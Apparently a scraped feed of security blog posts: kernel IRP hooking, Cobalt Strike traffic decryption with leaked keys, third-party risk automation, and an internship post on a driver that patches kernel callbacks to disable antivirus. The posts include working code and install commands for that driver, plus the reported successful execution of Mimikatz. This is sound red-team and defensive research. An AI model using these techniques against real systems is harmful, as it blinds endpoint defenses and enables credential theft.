    DriverObject->DriverUnload = InterceptUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =  InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = InterceptDeviceControl;

    //...
}

The DriverObject->DriverUnload dispatch routine is responsible for cleaning up and preventing any memory leaks before the driver unloads. A leak in the kernel will persist until the machine is rebooted. The IRP_MJ_CREATE and IRP_MJ_CLOSE Major Functions handle CreateFile() and CloseHandle() calls. Without them, handles to the driver wouldn’t be able to be created or destroyed, so in a way the driver would be unusable. Finally, the IRP_MJ_DEVICE_CONTROL Major Function is in charge of I/O operations/communications.

A typical driver communicates by receiving requests, handling those requests or forwarding them to the appropriate device in the device stack (out of scope for this blogpost). These requests come in the form of an I/O Request Packet or IRP, which is a semi-documented structure, accompanied by one or more IO_STACK_LOCATION structures, located in memory directly following the IRP. Each IO_STACK_LOCATION is related to a device in the device stack and the driver can call the IoGetCurrentIrpStackLocation() function to retrieve the IO_STACK_LOCATION related to itself.

The previously mentioned dispatch routines determine how these IRPs are handled by the driver. We are interested in the IRP_MJ_DEVICE_CONTROL dispatch routine, which corresponds to the DeviceIoControl() call from user mode or ZwDeviceIoControlFile() call from kernel mode. An IRP request destined for IRP_MJ_DEVICE_CONTROL contains two user buffers, one for reading and one for writing, as well as a control code indicated by the IOCTL_ prefix. These control codes are defined by the driver developer and indicate the supported actions.

Control codes are built using the CTL_CODE macro, defined as:

#define CTL_CODE(DeviceType, Function, Method, Access)((DeviceType) << 16 | ((Access) << 14) | ((Function) << 2) | (Method))

Example for my Interceptor driver:

#define IOCTL_INTERCEPTOR_HOOK_DRIVER CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_DRIVER CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_LIST_DRIVERS CTL_CODE(0x8000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_ALL_DRIVERS CTL_CODE(0x8000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)

3. Kernel land hooks

Now that we have a vague idea how drivers communicate with other drivers and applications, we can think about ways to intercept those communications. One of these techniques is called IRP MajorFunction hooking.

hook MFA

Since drivers and all other kernel processes share the same memory, we can also access and overwrite that memory as long as we don’t upset PatchGuard by modifying critical structures. I wrote a driver called Interceptor, which does exactly that. It locates the target driver’s DriverObject and retrieves its MajorFunction array (MFA). This is done using the undocumented ObReferenceObjectByName() function, which uses the driver device name to get a pointer to the DriverObject.

UNICODE_STRING targetDriverName = RTL_CONSTANT_STRING(L"\\Driver\\Disk");
PDRIVER_OBJECT DriverObject = nullptr;

status = ObReferenceObjectByName(
	&targetDriverName,
	OBJ_CASE_INSENSITIVE,
	nullptr,
	0,
	*IoDriverObjectType,
	KernelMode,
	nullptr,
	(PVOID*)&DriverObject
);

if (!NT_SUCCESS(status)) {
	KdPrint((DRIVER_PREFIX "failed to obtain DriverObject (0x%08X)\n", status));
	return status;
}

Once it has obtained the MFA, it will iterate over all the Dispatch Routines (IRP_MJ_) and replace the pointers, which are pointing to the target driver’s functions (0x1000 – 0x1003), with my own pointers, pointing to the *InterceptHook functions (0x2000 – 0x2003), controlled by the Interceptor driver.

for (int i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) {
    //save the original pointer in case we need to restore it later
	globals.originalDispatchFunctionArray[i] = DriverObject->MajorFunction[i];
    //replace the pointer with our own pointer
	DriverObject->MajorFunction[i] = &GenericHook;
}
//cleanup
ObDereferenceObject(DriverObject);

As an example, I hooked the disk driver’s IRP_MJ_DEVICE_CONTROL dispatch routine and intercepted the calls:

Hooked IRP Disk Driver

This method can be used to intercept communications to any driver but is fairly easy to detect. A driver controlled by EDR/AV could iterate over its own MajorFunction array and check the function pointer’s address to see if it is located in its own address range. If the function pointer is located outside its own address range, that means the dispatch routine was hooked.

4. Conclusion

To defeat EDRs in kernel space, it is important to know what goes on at the core, namely the driver. In this blogpost we examined the anatomy of a driver, its functions, and their main responsibilities. We established that a driver needs to communicate with other drivers and applications in user space, which it does via dispatch routines registered in the driver’s MajorFunction array.

We then briefly looked at how we can intercept these communications by using a technique called IRP MajorFunction hooking, which patches the target driver’s dispatch routines in memory with pointers to our own functions, so we can inspect or redirect traffic.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2

27 October 2021 at 08:49

We decrypt Cobalt Strike traffic using one of 6 private keys we found.

In this blog post, we will analyze a Cobalt Strike infection by looking at a full packet capture that was taken during the infection. This analysis includes decryption of the C2 traffic.

If you haven’t already, we invite you to read part 1 first: Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1.

For this analysis, we are using capture file 2021-02-02-Hancitor-with-Ficker-Stealer-and-Cobalt-Strike-and-NetSupport-RAT.pcap.zip, this is one of the many malware traffic capture files that Brad Duncan shares on his web site Malware-Traffic-Analysis.net.

We start with a minimum of knowledge: the capture file contains encrypted HTTP traffic of a Cobalt Strike beacon communicating with its team server.

If you want to know more about Cobalt Strike and its components, we highly recommend the following blog post.

First step: we open the capture file with Wireshark, and look for downloads of a full beacon by stager shellcode.

Although beacons can come in many forms, we can identify 2 major categories:

  1. A small piece of shellcode (a couple of hundred bytes), aka the stager shellcode, that downloads the full beacon
  2. The full beacon: a PE file that can be reflectively loaded

In this first step, we search for signs of stager shellcode in the capture file: we do this with the following display filter: http.request.uri matches “/….$”.

Figure 1: packet capture for Cobalt Strike traffic

We have one hit. The path used in the GET request to download the full beacon, consists of 4 characters that satisfy a condition: the byte-value of the sum of the character values (aka checksum 8) is a known constant. We can check this with the tool metatool.py like this:

Figure 2: using metatool.py

More info on this checksum process can be found here.
The output of the tool shows that this is a valid path to download a 32-bit full beacon (CS x86).
The download of the full beacon is captured too:

Figure 3: full beacon download

And we can extract this download:

Figure 4: export HTTP objects
Figure 5: selecting download EbHm for saving
Figure 6: saving selected download to disk

Once the full beacon has been saved to disk as EbHm.vir, it can be analyzed with tool 1768.py. 1768.py is a tool that can decode/decrypt Cobalt Strike beacons, and extract their configuration. Cobalt Strike beacons have many configuration options: all these options are stored in an encoded and embedded table.

Here is the output of the analysis:

Figure 7: extracting beacon configuration

Let’s take a closer look at some of the options.

First of all, option 0x0000 tells us that this is an HTTP beacon: it communicates over HTTP.
It does this by connecting to 192.254.79[.]71 (option 0x0008) on port 8080 (option 0x0002).
GET requests use path /ptj (option 0x0008), and POST requests use path /submit.php (option 0x000a)
And important for our analysis: there is a known private key (Has known private key) for the public key used by this beacon (option 0x0007).

Thus, armed with this information, we know that the beacon will send GET requests to the team server, to obtain instructions. If the team server has commands to be executed by the beacon, it will reply with encrypted data to the GET request. And when the beacon has to send back output from its commands to the team server, it will use a POST request with encrypted data.

If the team server has no commands for the beacon, it will send no encrypted data. This does not necessarily mean that the reply to a GET request contains no data: it is possible for the operator, through profiles, to masquerade the communication. For example, that the encrypted data is inside a GIF file. But that is not the case with this beacon. We know this, because there are no so-called malleable C2 instructions in this profile: option 0x000b is equal to 0x00000004 -> this means no operations should be performed on the data prior to decryption (we will explain this in more detail in a later blog post).

Let’s create a display filter to view this C2 traffic: http and ip.addr == 192.254.79[.]71

Figure 8: full beacon download and HTTP requests with encrypted Cobalt Strike traffic

This displays all HTTP traffic to and from the team server. Remark that we already took a look at the first 2 packets in this view (packets 6034 and 6703): that’s the download of the beacon itself, and that communication is not encrypted. Hence, we will filter these packets out with the following display filter:

http and ip.addr == 192.254.79.71 and frame.number > 6703

This gives us a list of GET requests with their reply. Remark that there’s a GET request every minute. That too is in the beacon configuration: 60.000 ms of sleep (option 0x0003) with 0% variation (aka jitter, option 0x0005).

Figure 9: HTTP requests with encrypted Cobalt Strike traffic

We will now follow the first HTTP stream:

Figure 10: following HTTP stream
Figure 11: first HTTP stream

This is a GET request for /ptj that receives a STATUS 200 reply with no data. This means that there are no commands from the team server for this beacon for now: the operator has not issued any commands at that point in the capture file.

Remark the Cookie header of the GET request. This looks like a BASE64 string: KN9zfIq31DBBdLtF4JUjmrhm0lRKkC/I/zAiJ+Xxjz787h9yh35cRjEnXJAwQcWP4chXobXT/E5YrZjgreeGTrORnj//A5iZw2TClEnt++gLMyMHwgjsnvg9czGx6Ekpz0L1uEfkVoo4MpQ0/kJk9myZagRrPrFWdE9U7BwCzlE=

That value is encrypted metadata that the beacon sends as a BASE64 string to the team server. This metadata is RSA encrypted with the public key inside the beacon configuration (option 0x0007), and the team server can decrypt this metadata because it has the private key. Remember that some private keys have been “leaked”, we discussed this in our first blog post in this series.

Our beacon analysis showed that this beacon uses a public key with a known private key. This means we can use tool cs-decrypt-metadata.py to decrypt the metadata (cookie) like this:

Figure 12: decrypting beacon metadata

We can see here the decrypted metadata. Very important to us, is the raw key: caeab4f452fe41182d504aa24966fbd0. We will use this key to decrypt traffic (the AES adn HMAC keys are derived from this raw key).

More metadata that we can find here is: the computername, the username, …

We will now follow the HTTP stream with packets 9379 and 9383: this is the first command send by the operator (team server) to the beacon:

Figure 13: HTTP stream with encrypted command

Here we can see that the reply contains 48 bytes of data (Content-length). That data is encrypted:

Figure 14: hexadecimal view of HTTP stream with encrypted command

Encrypted data like this, can be decrypted with tool cs-parse-http-traffic.py. Since the data is encrypted, we need to provide the raw key (option -r caeab4f452fe41182d504aa24966fbd0) and as the packet capture contains other traffic than pure Cobalt Strike C2 traffic, it is best to provide a display filter (option -Y http and ip.addr == 192.254.79.71 and frame.number > 6703) so that the tool can ignore all HTTP traffic that is not C2 traffic.

This produces the following output:

Figure 15: decrypted commands and results

Now we can see that the encrypted data in packet 9383 is a sleep command, with a sleeptime of 100 ms and a jitter factor of 90%. This means that the operator instructed the beacon to beacon interactive.

Decrypted packet 9707 contains an unknown command (id 53), but when we look at packet 9723, we see a directory listing output: this is the output result of the unknown command 53 being send back to the team server (notice the POST url /submit.php). Thus it’s safe to assume that command 53 is a directory listing command.

There are many commands and results in this capture file that tool cs-parse-http-traffic.py can decrypt, too much to show here. But we invite you to reproduce the commands in this blog post, and review the output of the tool.

The last command in the capture file is a process listing command:

Figure 16: decrypted process listing command and result

Conclusion

Although the packet capture file we decrypted here was produced more than half a year ago by Brad Duncan by running a malicious Cobalt Strike beacon inside a sandbox, we can decrypt it today because the operators used a rogue Cobalt Strike package including a private key, that we recovered from VirusTotal.

Without this private key, we would not be able to decrypt the traffic.

The private key is not the only way to decrypt the traffic: if the AES key can be extracted from process memory, we can also decrypt traffic. We will cover this in an upcoming blog post.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Automate, automate, automate: Three Ways to Increase the Value from Third Party Risk Management Efforts

26 October 2021 at 15:28

Third Party Risk Management (“TPRM”) efforts are often considered labour-intensive, with numerous tedious, manual steps. Often, an equal amount of effort is put into managing the process as is to focusing on risks. In order to avoid this, we’d like to share three ways in which we’ve been boosting our own TPRM efficiency – through automation of three crucial phases in the third party risk assessment process:

(1) during initiation (the business risk/criticality assessment),

(2) while performing your third party (due diligence) assessments and

(3) during the monitoring phase following the assessment.

This article elaborates further on the automation of the above.

  1. Automate the third-party criticality assessment

When you are applying a risk-based approach to your TPRM efforts, third party assessments are initiated with a criticality or business risk assessment using information from the business owner working with the third party. Most of our customers will document the criticality assessment in an Excel file with a lot of back-and-forth communication.

When reviewing the intake form, we realised that the intake could be distilled to a few multiple-choice questions, such as the highest category of data the third-party can access, the level of system access and so on. We created the possibility for the customer to conduct a short, simplified assessment through Microsoft Forms. This is easily available through one single link and avoids clutter (caused by different versions of Excel files, for example). In addition, through Microsoft Flow, the output from that Form is automatically grabbed and imported in a repository. Finally, we made sure an MS Planner Task is created for each new assessment which triggers the involvement of the security second line function.

Figure 1: Gathering the MS Forms output, assigning an assessment ID and storing the gathered criticality assessment input data.
Figure 2: Summarising the outcome in an email to security team (for validation) and creation of a task for follow-up through MS Planner.

This approach results in significant value increase because it can:

  • Give the business owner a more user-friendly GUI rather than an Excel sheet, which they are expected to complete.
  • Enable owners to initiate a third-party security assessment at any given time, without the initiation by second line.
  • Empower the second line to focus on understanding and challenging the provided input.
  • Improve administration aspects around the execution of the third-party security risk assessments are completed within a short time frame.

Do you want to take it to the next level? Integrate an automated approval through Power Automate for the security team.

The above case requires a low effort customisation to fully tailor this to your organisation and guarantees time efficiencies and better flexibility.

  1. Automate the execution of the assessments by leveraging tooling

You might still be wondering: how do we finally get rid of those Excel files to exchange with our third parties?  You could address this by using tooling throughout the assessment process. By leveraging these tools (such as Ceeyu, OneTrust Vendorpedia, Security Scorecard Atlas, Qualys SAQ, Prevalent and more) not only the tedious tasks of the criticality assessment, but also those of the consequential third party due diligence assessment, can be automated. Examples of tasks we have automated with such tooling include:

  • The exchange of the due diligence questionnaires.
  • The uploading and collecting of supporting evidence.
  • The tracking of the overall progress of the assessment (including the history of the review), and
  • Reporting of the assessment outcome and scoring (including comparison of vendors).

Again, significant value increase is the result and you can:

  • Reduce time-to-market: the administrative overhead per assessment, leading to a reduced average lead time of the assessment.
  • Identify bottlenecks: clearly pinpoint the bottleneck if the assessment does get stuck somewhere with a centralized overview of the actual status of the assessment.
  • Free up valuable time: allow the security team reviewing the provided input to focus their time on what really matters: reviewing the output.
  • Leverage reporting possibilities: minimise the effort in creating custom reports for management reporting using the cutting edge built-in reporting features.

Of course, this requires having the right tools at your disposition – however, implemented at scale, the efficiency and quality returns of the tools nearly always surpass the cost of such tooling. At NVISO for example, we’ve been able to decrease our nominal assessment cost by about 20% and our tool provides a portal to our customers that brings transparency and visibility on the handling of incoming TPRM requests.

  1. Automate the monitoring and follow-up on agreed actions by leveraging tooling

In order to maximise automation, you should also consider it for your monitoring actions. Very often assessments remain a point-in-time assessment (“snapshot”) which only paints a partial picture on how seriously your third parties take security. It is of equal importance to monitor their efforts to improve their security posture over time – i.e. the timely and effective implementation of your recommendations, and the evolution of their overall security posture. Automation can also play a major role in this process.

Here also, you would create value increase because you can:

  • Automate action plan monitoring: send automated reminders to the third parties in line with set due dates for identified follow-up actions.
  • Automate escalation: escalate to the business owner in case of overdue actions, potentially with different business rules depending on the business criticality of the supplier.
  • Free up valuable time: reducing manual interventions of your second line team helps focusing on where it really matters: is the identified action effectively addressed? Is the remediation effective in reducing the risk? We typically adopt a risk-driven, sample-based approach in verifying this.
  • Stay up to date: trigger automated reinitiation of assessments when they are due for a third party.

To facilitate this, you will again require the right tools at your disposition. A dedicated TPRM tool is a plus, although it’s perfectly feasible to also realise this through Microsoft 365 for example. This monitoring process is also something we offer as an option in our TPRM as a service solution.

Conclusion

To summarise: all of the above automation efforts (even through leveraging tools you might already have at hand) can significantly increase the value you get from your efforts in the Third Party Risk Management (TPRM) process. Customers, as well as third parties, see the benefits of these automation initiatives in the process: it reduces their involvement, it’s easier to track the various assessments and eventually it allows them to focus on the outcome of their TPRM efforts.

If you are looking at ways to boost your TPRM efforts and are seeking assistance in implementing this within your organisation, don’t hesitate to reach out to me through [email protected].

Kernel Karnage – Part 1

21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi.dll,... and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (x64-bit), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64-bit edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Window kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.

bugcheck

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to a EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft made an end to patching SSDT in x64-bit versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straight forward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

bsod

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

PsSetCreateProcessNotifyRoutine

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

PspSetCreateProcessNotifyRoutine

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and

The driver roughly follows the same method to locate the callback array in memory; by calculating offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop though the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the relative offset to the callback array
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where OPCODE_*[g_WindowsIndex] are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumer).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

